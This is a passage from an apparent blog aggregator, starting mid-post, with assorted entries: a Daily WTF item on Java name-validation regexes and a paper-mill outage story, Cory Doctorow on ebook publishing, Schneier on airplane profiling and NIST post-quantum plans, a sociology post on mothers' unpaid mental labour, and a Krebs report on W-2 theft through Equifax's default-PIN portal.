Those two examples are both clear cases of ignorance-of-built-ins, and they’re a little sloppy and perhaps a bit more cryptic than necessary, but hey, at least they’re not using regular expressions.

Speaking of regular expressions, normally, we think of a person’s name as an arbitrary string. There are too many edge cases, too many unexpected characters, too many cultural differences to have a simple rule that says, “This is what a valid name looks like”.

Stefan’s co-worker didn’t like that line of thought. They wrote a set of regexes that gradually grew to account for more and more exceptions.

    public final static Pattern Lastname = Pattern.compile("^[\\pL]+[\\.\\']?((\\-| )*[,\\pL]+[\\.]?)*$");
    public final static Pattern Firstname = Pattern.compile("^[\\pL]+[\\.]?((\\-| )[\\pL]+[\\.]?)*$");
    public final static Pattern AcademicTitle = Pattern.compile("^[\\pL]+[\\.]?((\\-| )[\\pL]+[\\.]?)*$");

These validations were used to process a bulk-upload of customer data. When a single record failed validation, it wouldn’t be saved- and all of the following records would fail silently. This created a number of messes.

[Advertisement] Release! is a light card game about software and the people who make it. Play with 2-5 people, or up to 10 with two copies - only $9.95 shipped!

Cory DoctorowPeace in Our Time: how publishers, libraries and writers could work together


Publishing is in a weird place: ebook sales are stagnating; publishing has shrunk to five major publishers; libraries and publishers are at each others’ throats over ebook pricing; and major writers’ groups are up in arms over ebook royalties, and, of course, we only have one major book retailer left — what is to be done?


In my new Locus Magazine column, “Peace in Our Time,” I propose a pair of software projects that could bring all together writers, publishers and libraries to increase competition, give publishers the market intelligence they need to sell more books, triple writers’ ebook royalties, and sell more ebooks to libraries, on much fairer terms.

The first project is a free/open version of Overdrive, the software that publishers insist that libraries use for ebook circulation. A free/open version, collectively created and maintained by the library community, would create a source of data that publishers could use to compete with Amazon, their biggest frenemy, while still protecting patron privacy. The publishers’ quid-pro-quo for this data would be an end to the practice of gouging libraries on ebook prices, leaving them with more capital to buy more books.

The second project is a federated ebook store for writers, that would allow writers to act as retailers for their publishers, selling their own books and keeping the retailer’s share in addition to their traditional royalty: a move that would increase the writer’s share by 300%, without costing the publishers a penny. Writer-operated ebook stores, spread all over the Web but searchable from central portals, do not violate the publishers’ agreements with Amazon, but they do create new sales category: “fair trade ebooks,” whose sale gives the writers you love the money to feed their families and write more books — without costing you anything extra.

Amazon knows, in realtime, how publishers’ books are performing. It knows who is buying them, where they’re buying them, where they’re reading them, what they searched for before buying them, what other books they buy at the same time, what books they buy before and after, whether they read them, how fast they read them, and whether they finish them.

Amazon discloses almost none of this to the publishers, and what information they do disclose to the publishers (the sales data for the publishers’ own books, atomized, without data-mineable associations) they disclose after 30 days, or 90 days, or 180 days. Publishers try to fill in the gaps by buying their own data back from the remaining print booksellers, through subscriptions to point-of-sale databases that have limited relevance to e-book performance.

There is only one database of e-book data that is remotely comparable to the data that Amazon mines to stay ahead of the publishers: e-book circulation data from public libraries. This data is not as deep as Ama­zon’s – thankfully, since it’s creepy and terrible that Amazon knows about your reading habits in all this depth, and it’s right and fitting that libraries have refused to turn on that kind of surveillance for their own e-book circulation.

Peace in Our Time [Cory Doctorow/Locus]

,

CryptogramEconomist Detained for Doing Math on an Airplane

An economics professor was detained when he was spotted doing math on an airplane:

On Thursday evening, a 40-year-old man ­-- with dark, curly hair, olive skin and an exotic foreign accent --­ boarded a plane. It was a regional jet making a short, uneventful hop from Philadelphia to nearby Syracuse.

Or so dozens of unsuspecting passengers thought.

The curly-haired man tried to keep to himself, intently if inscrutably scribbling on a notepad he'd brought aboard. His seatmate, a blond-haired, 30-something woman sporting flip-flops and a red tote bag, looked him over. He was wearing navy Diesel jeans and a red Lacoste sweater -- a look he would later describe as "simple elegance" -- but something about him didn't seem right to her.

She decided to try out some small talk.

Is Syracuse home? She asked.

No, he replied curtly.

He similarly deflected further questions. He appeared laser-focused ­-- perhaps too laser-focused ­-- on the task at hand, those strange scribblings.

Rebuffed, the woman began reading her book. Or pretending to read, anyway. Shortly after boarding had finished, she flagged down a flight attendant and handed that crew-member a note of her own.

This story ended better than some. Economics professor Guido Menzio (yes, he's Italian) was taken off the plane, questioned, cleared, and allowed to board with the rest of his passengers two hours later.

This is a result of our stupid "see something, say something" culture. As I repeatedly say: "If you ask amateurs to act as front-line security personnel, you shouldn't be surprised when you get amateur security."

On the other hand, "Algebra, of course, does have Arabic origins plus math is used to make bombs." Plus, this fine joke from 2003:

At Heathrow Airport today, an individual, later discovered to be a school teacher, was arrested trying to board a flight while in possession of a compass, a protractor, and a graphical calculator.

Authorities believe she is a member of the notorious al-Gebra movement. She is being charged with carrying weapons of math instruction.

AP story. Slashdot thread.

Seriously, though, I worry that this kind of thing will happen to me. I'm older, and I'm not very Semitic looking, but I am curt to my seatmates and intently focused on what I am doing -- which sometimes involves looking at web pages about, and writing about, security and terrorism. I'm sure I'm vaguely suspicious.

EDITED TO ADD: Last month a student was removed from an airplane for speaking Arabic.

Sociological ImagesThe Invisible Worry Work of Mothering

Way back in 1996 sociologist Susan Walzer published a research article pointing to one of the more insidious gender gaps in household labor: thinking. It was called “Thinking about the Baby.”

In it, Walzer argued that women do more of the intellectual and emotional work of childcare and household maintenance. They do more of the learning and information processing (like buying and reading “how-to” books about parenting or researching pediatricians). They do more worrying (like wondering if their child is hitting his developmental milestones or has enough friends at school). And they do more organizing and delegating (like deciding when towels need washing or what needs to be purchased at the grocery store), even when their partner “helps out” by accepting assigned chores.

For Mother’s Day, a parenting blogger named Ellen Seidman powerfully describes this exhausting and almost entirely invisible job. I am compelled to share. Her essay centers on the phrase “I am the person who notices…” It starts with the toilet paper running out and it goes on… and on… and on… and on. Read it.

She doesn’t politicize what she calls an “uncanny ability to see things… [that enable] our family to basically exist.” She defends her husband (which is fine) and instead relies on a “reduction to personality,” that technique of dismissing unequal workloads first described in the canonical book The Second Shift: somehow it just so happens that it’s her and not her husband that notices all these things.

But I’ll politicize it. The data suggests that it is not an accident that it is she and not her husband that does this vital and brain-engrossing job. Nor is it an accident that it is a job that gets almost no recognition and entirely no pay. It’s work women disproportionately do all over America. So, read it. Read it and remember to be thankful for whoever it is in your life that does these things. Or, if it is you, feel righteous and demand a little more recognition and burden sharing. Not on Mother’s Day. That’s just one day. Everyday.

Lisa Wade is a professor at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. Find her on TwitterFacebook, and Instagram.

(View original at https://thesocietypages.org/socimages)

CryptogramNIST Starts Planning for Post-Quantum Cryptography

Last year, the NSA announced its plans for transitioning to cryptography that is resistant to a quantum computer. Now, it's NIST's turn. Its just-released report talks about the importance of algorithm agility and quantum resistance. Sometime soon, it's going to have a competition for quantum-resistant public-key algorithms:

Creating those newer, safer algorithms is the longer-term goal, Moody says. A key part of this effort will be an open collaboration with the public, which will be invited to devise and vet cryptographic methods that -- to the best of experts' knowledge -- ­will be resistant to quantum attack. NIST plans to launch this collaboration formally sometime in the next few months, but in general, Moody says it will resemble past competitions such as the one for developing the SHA-3 hash algorithm, used in part for authenticating digital messages.

"It will be a long process involving public vetting of quantum-resistant algorithms," Moody said. "And we're not expecting to have just one winner. There are several systems in use that could be broken by a quantum computer­ -- public-key encryption and digital signatures, to take two examples­ -- and we will need different solutions for each of those systems."

The report rightly states that we're okay in the symmetric cryptography world; the key lengths are long enough.

This is an excellent development. NIST has done an excellent job with their previous cryptographic standards, giving us a couple of good, strong, well-reviewed, and patent-free algorithms. I have no doubt this process will be equally excellent. (If NIST is keeping a list, aside from post-quantum public-key algorithms, I would like to see competitions for a larger-block-size block cipher and a super-fast stream cipher as well.)

Two news articles.

Worse Than FailureThat 70's Paper Mill

The late Seventies was a lucrative time for Finnish-based Kirkniemi Paperi, a paper production powerhouse. Puoval had a great opportunity to cash in on the profits by helping to integrate a completely automated, computer-based production system. His degree in electronic engineering was finally going to pay off.

Thanks to the invention of the Intel 8085 microprocessor, it became possible to turn trees in to paper quicker than ever. Puoval had a mandate from Kirkniemi ownership to spare no expense with getting the system up and running since their biggest competitor implemented a similar system the year before. But if they had a bumpy rollout, it would be incredibly damaging to both the company and Puoval's livelihood. Painting of paper-making at Hahnemühle

The system would have to control paper machines more than a hundred meters long, capable of moving paper through them at 80 kiliometers per hour (which would make for one wicked paper cut). While they were literally well-oiled machines, a small problem with any part of the production would bring things to a halt due to everything being interconnected. When paper-making stops, moneymaking stops and the bosses get angry.

Despite the risk, Puoval was up to the task. He drooled over the hardware he was allowed to bring in to be the brains of the operation. He got to set up a whole army of blazing-fast 6 Mhz Intel 8085's, cages full of in-house built Eurocard logic boards, analog and digital sensors, kilobytes of tight machine code, the whole works. As a fail-safe, Puoval even set up a battery backup system, and line conditioning to prevent a power surge from frying his masterpiece.

It was a long and difficult setup process, but Puoval's brainchild sparked to life and, amazingly, worked as intended right away. The output of the paper mill increased 40% and Puoval's bank account increased 100%. For over a year, it hummed along flawlessly cranking out gloriously large rolls of paper. But then, this feel-good story got beat to a pulp.

Late one night around 11 PM, Puoval's phone rang. On the other end was the panicked 2nd shift manager of the mill. "Puoval! Are you still awake? GOOD! We need you in here ASAP! THE SYSTEM IS DOWN!"

"What do you mean it's down?" Puoval asked back through growing sleepiness.

"Well, the machines were running just fine, then out of nowhere, they just shut off and ground to a halt. Paper went flying off the rolls all over the place. It's like a gang of mummies exploded in here!"

"Ok, I'll get dressed and be in as soon as I can," Puoval sighed, unsure what to expect upon his arrival.

While the 2nd shift line technicians cleaned up the paper disaster, Puoval headed for his control system. He half expected to see it charred and smoking, but everything looked fine. He ran some system diagnostics and nothing looked out of the ordinary other than the sudden cutoff in the logs when everything stopped. He began the lengthy startup process of the system and machines and the mill was back in action.

When the bosses caught wind of the unexplained failure in the morning, Puoval was put on notice that it could not happen again. "Understood. I'm going to give everything a thorough inspection today, and stay late to make sure nothing weird is happening during 2nd shift," he assured the powers-that-be.

Midnight rolled around and everything was still humming along. Puoval decided to head home but made it clear to the manager to call him immediately if even the slightest thing went wrong. Fortunately nothing went wrong that night. Or the next night. Puoval was ready to chalk it up to a one-time freak occurrence. But the 3rd night his phone rang around 11 PM again. "PUOVAL! WE NEED YOU NOW!"

Puoval came in to find the same situation as three nights before. He got everything running again but in the morning the bosses demanded he work both 1st and 2nd shift every day until he had an answer. Two late nights came to pass without a hitch. But when the dreaded 3rd night arrived, he was on high alert. The clock ticked towards 11 PM and he began to sweat. Nothing could go wrong though, as he was watching his beloved system like a hawk.

Just as he was sure nothing would go wrong this day, an innocent-looking cleaning lady strolled up pushing a large commercial vacuum cleaner. He watched her ignore the multiple signs around the cage of his computers that said "DO NOT USE THESE OUTLETS, EVER!" and begin to plug in her vacuum. Puoval sprang at her, shouting to stop.

Not expecting his rapid advance, she had a look of dread come across her face. "But I need to clean?"

"Absolutely not! Not right here! You will bring this whole plant to its knees!" Puoval warned. Upon further explanation, the cleaning lady's behemoth vacuum was a new addition to the fleet. The smaller, economical one didn't draw enough juice to take Puoval's system down. Once this beast was plugged in to the forbidden outlet, which happened to be past the line conditioners, everything came crashing down. At least Puoval found his explanation, albeit a ridiculous one, so that he may retire from 2nd shift.

[Advertisement] Manage IT infrastructure as code across all environments with Puppet. Puppet Enterprise now offers more control and insight, with role-based access control, activity logging and all-new Puppet Apps. Start your free trial today!

,

Krebs on SecurityCrooks Grab W-2s from Credit Bureau Equifax

Identity thieves stole tax and salary data from big-three credit bureau Equifax Inc., according to a letter that grocery giant Kroger sent to all current and some former employees on Thursday. The nation’s largest grocery chain by revenue appears to be one of several Equifax customers that were similarly victimized this year.

Atlanta-based Equifax’s W-2Express site makes electronic W-2 forms accessible for download for many companies, including Kroger — which employs more than 431,000 people. According to a letter Kroger sent to employees dated May 5, thieves were able to access W-2 data merely by entering at Equifax’s portal the employee’s default PIN code, which was nothing more than the last four digits of the employee’s Social Security number and their four-digit birth year.

“It appears that unknown individuals have accessed [Equifax’s] W2Express website using default log-in information based on Social Security numbers (SSN) and dates of birth, which we believe were obtained from some other source, such as a prior data breach at other institutions,” Kroger wrote in a FAQ about the incident that was included with the letter sent to employees. “We have no indication that Kroger’s systems have been compromised.”

The FAQ continued:

“At this time, we have no indication that associates who had created a new password (did not use the default PIN) were affected, and we are still identifying which associates still using the default PIN may have been affected. We believe individuals gained access to some Kroger associates’ electronic W-2 forms and may have used the information to file tax returns in their names in an effort to claim a fraudulent refund.”

“Kroger is working with Equifax and the authorities to determine who is affected and restore secure access to W-2Express. At this time, we believe you are among our current and former Kroger associates using the default PIN in the W-2Express system. This does not necessarily mean your W-2 was accessed as part of this security incident. We are still working to identify which individuals’ information was accessed.”

Kroger said it doesn’t yet know how many of its employees may have been affected.

The incident comes amid news first reported on this blog earlier this week that tax fraudsters similarly targeted employees of companies that used payroll giant ADP to give employees access to their W-2 data. ADP acknowledged that the incident affected employees at U.S. Bank and at least 11 other companies.

Equifax did not respond to requests for comment about how many other customer companies may have been affected by the same default (in)security. But Kroger spokesman Keith Dailey said other companies that relied on Equifax for W-2 data also relied on the last four of the SSN and 4-digit birth year as authenticators.

“As far as I know, it’s the standard Equifax setup,” Dailey said.

Last month, Stanford University alerted 600 current and former employees that their data was similarly accessed by ID thieves via Equifax’s W-2Express portal. Northwestern University also just alerted 150 employees that their salary and tax data was stolen via Equifax this year.

In a statement released to KrebsOnSecurity, Equifax spokeswoman Dianne Bernez confirmed that the company had been made aware of suspected fraudulent access to payroll information through its W-2Express service by Kroger.

“The information in question was accessed by unauthorized individuals who were able to gain access by using users’ personally identifiable information,” the statement reads. “We have no reason to believe the personally identifiable information was attained through Equifax systems. Unfortunately, as individuals’ personally identifiable information has become more publicly available, these types of online fraud incidents have escalated. As a result, it is critical for consumers and businesses to take steps to protect consumers’ personally identifiable information including the use of strong passwords and PIN codes. We are working closely with Kroger to assess and monitor the situation.”

ID thieves go after W-2 data because it contains much of the information needed to fraudulently request a large tax refund from the IRS in someone else’s name. Kroger told employees they would know they were victims in this breach if they received a notice from the IRS about a fraudulent refund request filed in their name.

However, most victims first learn of the crime after having their returns rejected by the IRS because the scammers beat them to it. Even those who are not required to file a return can be victims of refund fraud, as can those who are not actually due a refund from the IRS.

Kroger said it would offer free credit monitoring services to employees affected by the breach. Kroger spokesman Dailey declined to say which company would be providing that monitoring, but he did confirm that it would not be Equifax.

Update, May 7, 9:44 a.m.: Added mention of the Northerwestern University incident involving Equifax’s W-2 portal.

Rondam RamblingsJust two little problems...

Donald Trump today tweeted "Happy Cinco de Mayo! The best taco bowls are made in Trump Tower Grill. I love Hispanics!" But there are two little problems (apart from the fact that he thinks Latinos are all drug dealers and rapists).  Take a look at the photo: That photo could not have been taken in the Trump Tower.  See those trees in the window?  The Trump Tower is on Fifth Avenue between

CryptogramFriday Squid Blogging: Firefly Squid in the News

It's a good time to see firefly squid in Japan.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.